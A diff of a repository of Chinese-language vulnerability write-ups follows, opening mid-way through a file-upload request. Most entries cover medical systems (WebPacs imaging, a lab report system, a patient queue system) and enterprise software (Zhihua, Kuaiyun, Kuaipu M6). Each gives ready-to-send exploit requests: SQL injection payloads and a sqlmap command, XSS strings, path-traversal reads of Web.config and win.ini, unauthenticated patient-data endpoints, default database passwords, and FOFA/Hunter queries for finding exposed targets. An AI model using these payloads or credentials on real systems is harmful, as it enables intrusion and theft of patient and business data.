+/wEPDwUJNjcyMTYyMDMwD2QWAmYPZBYCAgcPZBYCAgEQFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkFgICAQ8PFgIeBFRleHQFigI8TEkgY2xhc3M9VGFiSW4gaWQ9dGFiMSBzdHlsZT0nZGlzcGxheTonPjxBPuWfuuacrOS/oeaBrzwvQT4gPC9MST48TEkgY2xhc3M9VGFiT3V0IGlkPXRhYjQgIHN0eWxlPSdkaXNwbGF5Oic+PEEgIGhyZWY9L1VzZXIvQWNjb3VudEVkaXQuYXNweD90YWI9ND7pgInpobk8L0E+IDwvTEk+PExJIGNsYXNzPVRhYk91dCBpZD10YWI1ICBzdHlsZT0nZGlzcGxheTonPjxBICBocmVmPS9Vc2VyL0FjY291bnRFZGl0LmFzcHg/dGFiPTU+5a+G56CB6K6+572uPC9BPiA8L0xJPmRkZOX0i8mrnQ9ovw3e1OKO9NtVXO50 +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: 
form-data; name="__EVENTVALIDATION" + +/wEWBgKYv82vCAK8ko+sCwLj7JnWDwKavpXnAwKmyMubDAKW1typA0S4QAUrxTuiaAZtLTFPDJ6Hk6Mh +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="ceshi.txt" +Content-Type: text/plain + +nihaoanyun +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload" + +上传图片 +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName" + + +-----------------------------786435874t38587593865736587346567358735687 +Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail" + + +-----------------------------786435874t38587593865736587346567358735687-- +``` + +![1715656234280-31951fd0-70ff-453f-a111-f22b770a31b4.png](./img/KG8Se_y6bFrAXpwJ/1715656234280-31951fd0-70ff-453f-a111-f22b770a31b4-490989.png) + +3、访问上传文件 + +```plain +/_data/Uploads/xxx.txt +``` + +![1715656329056-51847e50-b1c8-4c99-8b34-5619819dc5ac.png](./img/KG8Se_y6bFrAXpwJ/1715656329056-51847e50-b1c8-4c99-8b34-5619819dc5ac-259114.png) + +![1715656372427-2ad70d86-e7cc-4162-bbde-088bed453bac.png](./img/KG8Se_y6bFrAXpwJ/1715656372427-2ad70d86-e7cc-4162-bbde-088bed453bac-696343.png) + + + +> 更新: 2024-05-14 11:15:15 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qntnmc5zz1xvm56h> \ No newline at end of file diff --git a/心医国际WebPacs系统存在SQL注入漏洞.md b/心医国际WebPacs系统存在SQL注入漏洞.md new file mode 100644 index 0000000..fd43496 --- /dev/null +++ b/心医国际WebPacs系统存在SQL注入漏洞.md 
@@ -0,0 +1,27 @@ +# 心医国际WebPacs系统存在SQL注入漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在SQL注入漏洞,攻击者可通过该漏洞获取系统敏感信息 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际WebPacs系统</font>![1714377037227-b954ff03-9791-4ba5-8249-d4f3ced98a2a.png](./img/j3up_6YSZduk9VZa/1714377037227-b954ff03-9791-4ba5-8249-d4f3ced98a2a-754504.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +POST /WebPacs/webpacs/studylistgrid HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +Connection: close +Content-Length: 154 + +type=normal&jianchahao=&department=&filmstate=&truename=&devicetypename=&studystatus=&patienttype=&huanzhehao=&devicename=&datelength=7&page=1&pageSize=10 +``` + +![1714376981011-1284d41f-097b-4b1c-85ca-9db879bf108d.png](./img/j3up_6YSZduk9VZa/1714376981011-1284d41f-097b-4b1c-85ca-9db879bf108d-746259.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hg0bkutvaqknmatg> \ No newline at end of file diff --git a/心医国际WebPacs系统存在XSS漏洞.md b/心医国际WebPacs系统存在XSS漏洞.md new file mode 100644 index 0000000..2584bef --- /dev/null +++ b/心医国际WebPacs系统存在XSS漏洞.md 
@@ -0,0 +1,18 @@ +# 心医国际WebPacs系统存在XSS漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际WebPacs系统存在XSS漏洞 +</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>** + +```plain +http://127.0.0.1/WebPacs/webpacs/pacsview?xeguid=%27-alert(123)(1)-%27&view=report +``` + +![1714378559826-ac84ebc3-5c0e-4735-881c-c5f9982ad68c.png](./img/UqwwuBHtIb6gDHbZ/1714378559826-ac84ebc3-5c0e-4735-881c-c5f9982ad68c-566514.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lfhr7qyafn7qabkz> \ No newline at end of file diff --git a/心医国际WebPacs系统存在未授权访问漏洞.md b/心医国际WebPacs系统存在未授权访问漏洞.md new file mode 100644 index 0000000..2eb9030 --- /dev/null +++ b/心医国际WebPacs系统存在未授权访问漏洞.md @@ -0,0 +1,18 @@ +# 心医国际WebPacs系统存在未授权访问漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在未授权访问漏洞,攻击者可通过该漏洞获取系统敏感信息 +</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>** + +```plain +/WebPacs/webpacs/pacs +``` + +![1714377119940-e310f7ff-0646-46ef-8fdc-6f04650116f1.png](./img/hZdTMQthxVtuKvY4/1714377119940-e310f7ff-0646-46ef-8fdc-6f04650116f1-034280.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/glibrpuqkoqgg9wz> \ No newline at end of file 
diff --git a/心医国际医技统计报表系统存在SQL注入漏洞.md b/心医国际医技统计报表系统存在SQL注入漏洞.md new file mode 100644 index 0000000..981b4cb --- /dev/null +++ b/心医国际医技统计报表系统存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +# 心医国际医技统计报表系统存在SQL注入漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在SQL注入漏洞,攻击者可通过该漏洞获取系统敏感信息 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/S4nzAYLJAV3ALS5_/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-912662.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +python3 sqlmap.py -u "http://127.0.0.1/EasyReport/login.do?method=handleRequestRole&t=731&userid=admin&_=1714374538731" -p userid +``` + +![1714374865701-7324443d-3be6-4063-ad61-a052c6b455ee.png](./img/S4nzAYLJAV3ALS5_/1714374865701-7324443d-3be6-4063-ad61-a052c6b455ee-234969.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvggxfx71i5i1y2x> \ No newline at end of file diff --git a/心医国际医技统计报表系统存在XSS漏洞.md b/心医国际医技统计报表系统存在XSS漏洞.md new file mode 100644 index 0000000..851ea83 --- /dev/null +++ b/心医国际医技统计报表系统存在XSS漏洞.md 
@@ -0,0 +1,30 @@ +# 心医国际医技统计报表系统存在XSS漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在XSS漏洞 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/4yG1B6lXa12dD60v/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-348600.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +POST /EasyReport/login.do?method=handleRequestInternal HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 55 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=E590069FD1A0C5B3ACA365A9A270FD01 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +pwd=admin&userid="><ScRiPt>alert(1)</sCrIpT>&userrole=0 +``` + +![1714378510351-d404cf53-907d-4f32-8083-9eef103238d9.png](./img/4yG1B6lXa12dD60v/1714378510351-d404cf53-907d-4f32-8083-9eef103238d9-698289.png) + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/py7flewrq4o85dbe> \ No newline at end of file diff --git a/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md b/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md new file mode 100644 index 0000000..bc5d434 --- /dev/null +++ b/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md 
@@ -0,0 +1,20 @@ +# 心医国际医技统计报表系统存在信息泄露及弱口令漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在弱口令漏洞,攻击者可通过该漏洞登录系统 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/EDqPjrxaNQ226zBw/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-042652.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +http://172.75.79.22:8090/EasyReport/login.do?method=loginPage +``` + +![1714376846432-84b8855e-e49d-4973-8c28-ba25be967542.png](./img/EDqPjrxaNQ226zBw/1714376846432-84b8855e-e49d-4973-8c28-ba25be967542-004033.png) + +![1714376879554-f02e9a26-6b0f-4667-b1a4-ce2be9ad7a37.png](./img/EDqPjrxaNQ226zBw/1714376879554-f02e9a26-6b0f-4667-b1a4-ce2be9ad7a37-313663.png) + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg1gauagl9lnp79z> \ No newline at end of file diff --git a/心医国际排队叫号系统SQL注入漏洞.md b/心医国际排队叫号系统SQL注入漏洞.md new file mode 100644 index 0000000..ae3850f --- /dev/null +++ b/心医国际排队叫号系统SQL注入漏洞.md 
@@ -0,0 +1,32 @@ +# 心医国际排队叫号系统SQL注入漏洞 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在SQL注入漏洞,攻击者可通过该漏洞获取系统敏感信息 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际排队叫号系统</font> + +![1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512.png](./img/s5tva-HDWfzF2MGk/1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512-526235.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Length: 104 + +patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator= +``` + +![1714374261063-c303ed6b-542b-49e7-b544-24d37b429933.png](./img/s5tva-HDWfzF2MGk/1714374261063-c303ed6b-542b-49e7-b544-24d37b429933-518638.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aa43lw54m4qgvg9s> \ No newline at end of file diff --git a/心医国际排队叫号系统敏感信息泄露.md b/心医国际排队叫号系统敏感信息泄露.md new file mode 100644 index 0000000..05ab6f1 --- /dev/null +++ b/心医国际排队叫号系统敏感信息泄露.md 
@@ -0,0 +1,45 @@ +# 心医国际排队叫号系统敏感信息泄露 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在未授权敏感信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息 +</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际排队叫号系统</font> + +![1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c.png](./img/xLWT12YcmtcwVbvt/1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c-885150.png)<font style="color:rgb(38, 38, 38);"> +</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>** + +```plain +POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Length: 104 + +patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator= +``` + +![1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1.png](./img/xLWT12YcmtcwVbvt/1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1-200892.png) + +```plain +POST /showqueue/showqueue/patient/statusUpdate HTTP/1.1 +Host: +Content-Length: 32 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Connection: close + +cardNo=1&cardType=out&socialNo=1 +``` + 
+![1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a.png](./img/xLWT12YcmtcwVbvt/1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a-495915.png) + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/so6gdl84a7wk9snw> \ No newline at end of file diff --git a/心医国际系统数据库默认口令.md b/心医国际系统数据库默认口令.md new file mode 100644 index 0000000..7a182d9 --- /dev/null +++ b/心医国际系统数据库默认口令.md @@ -0,0 +1,19 @@ +# 心医国际系统数据库默认口令 + +**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);"> +</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际系统数据库存在默认口令 +</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>** + +```plain +oracle数据库:xepacs/another(orcl) +sqlserver数据库:sa/another +``` + +![1714394515761-3500d3c2-8ef1-4672-a9be-207bac99712c.png](./img/p7DXMP3msAqIoeoq/1714394515761-3500d3c2-8ef1-4672-a9be-207bac99712c-377727.png) + + + + + +> 更新: 2024-06-17 09:27:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/os28kxppl3ce8em7> \ No newline at end of file diff --git a/志华软件openfile.aspx存在任意文件读取漏洞.md b/志华软件openfile.aspx存在任意文件读取漏洞.md new file mode 100644 index 0000000..b73ec00 --- /dev/null +++ b/志华软件openfile.aspx存在任意文件读取漏洞.md 
@@ -0,0 +1,24 @@ +# 志华软件openfile.aspx存在任意文件读取漏洞 + +志华软件openfile.aspx存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="b28web/Utility/" +``` + +## poc + +```javascript +GET /oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Cookie: ASP.NET_SessionId=vu5fjewt125x2erxrujcfj4p +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +``` + diff --git a/快云服务器助手GetDetail任意文件读取漏洞.md b/快云服务器助手GetDetail任意文件读取漏洞.md new file mode 100644 index 0000000..8ba4e5d --- /dev/null +++ b/快云服务器助手GetDetail任意文件读取漏洞.md @@ -0,0 +1,25 @@ +# 快云服务器助手GetDetail任意文件读取漏洞 + +快云服务器助手 filemana.aspx/GetDetail 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa + +```javascript +title="快云服务器助手" +``` + +## poc +```javascript +POST /FileMenu/filemana.aspx/GetDetail HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/json; charset=utf-8 +Connection: keep-alive + +{"fpath":"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows/win.ini"} +``` + +![image-20250103184809531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031848603.png) \ No newline at end of file diff --git a/快普M6SalaryAccounting存在SQL注入漏洞.md b/快普M6SalaryAccounting存在SQL注入漏洞.md new file mode 100644 index 0000000..8e5e368 --- /dev/null +++ b/快普M6SalaryAccounting存在SQL注入漏洞.md 
@@ -0,0 +1,102 @@ +# 快普M6 SalaryAccounting存在SQL注入漏洞 + +# 一、漏洞简介 +快普软件是一款综合性的企业管理软件,它涵盖了财务管理、人力资源管理、供应链管理、生产制造等多个方面。该软件以强大的功能和灵活性著称,能够满足不同企业的个性化需求。通过快普软件,企业可以更加高效地管理财务、人事、供应链和生产制造等各个环节,实现业务流程的优化和协同。同时,该软件还支持移动办公,方便企业随时随地进行业务处理和管理。总之,快普软件是一款功能强大、易于使用的企业管理软件,能够帮助企业提高运营效率和管理水平。快普M6 SalaryAccounting存在SQL注入漏洞 + +# 二、影响版本 ++ 快普M6 + +# 三、资产测绘 ++ hunter`web.body="Resource/JavaScript/jKPM6.DateTime.js"` ++ 特征 + +![1705249287850-2f1dd538-9c9e-43e0-8f03-a723c6834643.png](./img/tdsklyiA1YTnWaRM/1705249287850-2f1dd538-9c9e-43e0-8f03-a723c6834643-967314.png) + +# 四、漏洞复现 +```plain +POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=ecch4oew21q5s0d51waneyy4; http125331972318088ValidateCode=R3QT; iKey=IKEY%u8BBE%u5907%u672A%u8FDE%u63A5%uFF01; 3AB9D23F7A4B3C9B=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M; eid=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M +Upgrade-Insecure-Requests: 1 +SOAPAction: http://tempuri.org/Calculate +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 1112 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> + <soapenv:Header/> + <soapenv:Body> + <tem:Calculate> + <!--type: string--> + <tem:SalaryCategory></tem:SalaryCategory> + <!--type: string--> + <tem:StaffBirthDay></tem:StaffBirthDay> + <!--type: string--> + <tem:staffId> + 1) UNION ALL SELECT 
CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(70)+CHAR(108)+CHAR(70)+CHAR(75)+CHAR(107)+CHAR(66)+CHAR(112)+CHAR(72)+CHAR(110)+CHAR(75)+CHAR(98)+CHAR(74)+CHAR(67)+CHAR(79)+CHAR(115)+CHAR(108)+CHAR(67)+CHAR(75)+CHAR(98)+CHAR(68)+CHAR(100)+CHAR(84)+CHAR(98)+CHAR(112)+CHAR(121)+CHAR(101)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(79)+CHAR(110)+CHAR(83)+CHAR(69)+CHAR(90)+CHAR(89)+CHAR(102)+CHAR(105)+CHAR(70)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113)-- PCzU</tem:staffId> + <!--type: string--> + <tem:Department></tem:Department> + <!--type: string--> + <tem:SubOrg></tem:SubOrg> + <!--type: string--> + <tem:taxMonthly></tem:taxMonthly> + </tem:Calculate> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1705249349087-7137453d-e7dd-403d-bc71-430489a4605c.png](./img/tdsklyiA1YTnWaRM/1705249349087-7137453d-e7dd-403d-bc71-430489a4605c-387969.png) + +```plain +qbbqqOFlFKkBpHnKbJCOslCKbDdTbpyeicBOnSEZYfiFjqbpbq +``` + +sqlmap + +```plain +POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=ecch4oew21q5s0d51waneyy4; http125331972318088ValidateCode=R3QT; iKey=IKEY%u8BBE%u5907%u672A%u8FDE%u63A5%uFF01; 3AB9D23F7A4B3C9B=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M; eid=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M +Upgrade-Insecure-Requests: 1 +SOAPAction: http://tempuri.org/Calculate +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 1112 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> + <soapenv:Header/> + <soapenv:Body> + <tem:Calculate> + 